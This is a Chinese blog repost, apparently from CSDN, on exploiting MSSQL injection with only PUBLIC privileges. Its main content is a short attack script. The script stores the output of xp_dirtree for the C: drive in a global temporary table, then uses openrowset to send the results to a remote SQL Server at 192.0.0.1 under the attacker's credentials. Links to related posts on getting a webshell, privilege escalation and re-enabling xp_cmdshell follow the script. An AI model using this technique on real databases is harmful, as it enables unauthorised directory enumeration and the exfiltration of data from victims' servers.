MSSQL注入PUBLIC权限下的xp_dirtree再度利用

转载 2007年09月18日 13:54:00
本来这文章在TEAM里面放了好久的了!只 是<<art of sql injection>>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先 发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...

正文:

提 起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是 系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法 建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表

create table ##nonamed(

       dir ntext,

       num int

)

--调用存储过程把执行回来的数据存到临时表里面

insert ##nonamed execute master..xp_dirtree 'c:/',1

--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed

以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了 


Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964

相关文章推荐

mssql中public和db_owner权限下拿到webshell或者系统权限

在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到w...

Mssql 注入攻击,普通权限用户提权操作

如果该用户能够创建数据库的话use mastergocreate database bookgouse bookgoalter database book set RECOVERY FULLgocre...
  • hack8
  • hack8
  • 2011年03月01日 23:35
  • 1753

【利用“运行方式”获取win xp系统权限】

一般来说现在的电脑都会设置登录权限的,因为如果是在工作场合的话,有很多人是共用一台电脑的话这样的设置就很必要了,但是如果要获得权限那么该怎么办呢?如果你登录系统的用户是有权限限制的,那么当你需要运行那...

MSSQL2005恢复xp_cmdshell

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_co...
  • nhconch
  • nhconch
  • 2012年06月30日 15:33
  • 1171

MSSQL注入利用Group by&having猜表名和字段名

转自灵魂BLOG!! lcx和剑心等大牛在06年的时候就已经在用这种语法了,而我等小辈到最近才领略到,惭愧惭愧...... 手头暂时没有注入点测试,就先以我机器上的MSSQL做实验吧。 下面...
  • god_7z1
  • god_7z1
  • 2011年09月06日 13:44
  • 615

Java中 public、private、protected 访问权限的区别

 Java中public、private、protected 访问权限的区别 java平台中的public,protected,private是Java里用来定义成员的访问权限的,另外还有一种...

C++对于类访问权限public,protected,private的深刻理解

本帖转自网络,查找不到原作者,

public、protected和private访问权限以及继承问题

1.先来回顾与总结三中访问控制符各自的访问权限: private, public, protected 访问标号的访问范围: private:只能由1.该类中的函数、2.其友元函数访问。 ...

访问权限public,protected,private,default

public的用法(主要对不同包的类的访问权限进行修饰) 1.一个类被声明为public ,那么这个类的文件名必须与类同名 2.被声明为public的类,可以在不同包中被调用 3.public可以...

public protected private 三种权限区别

public protected private三种权限的区别总结: public(公有) protected(受保护) private(私有) 外部 Y ...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:MSSQL注入PUBLIC权限下的xp_dirtree再度利用
举报原因:
原因补充:

(最多只允许输入30个字)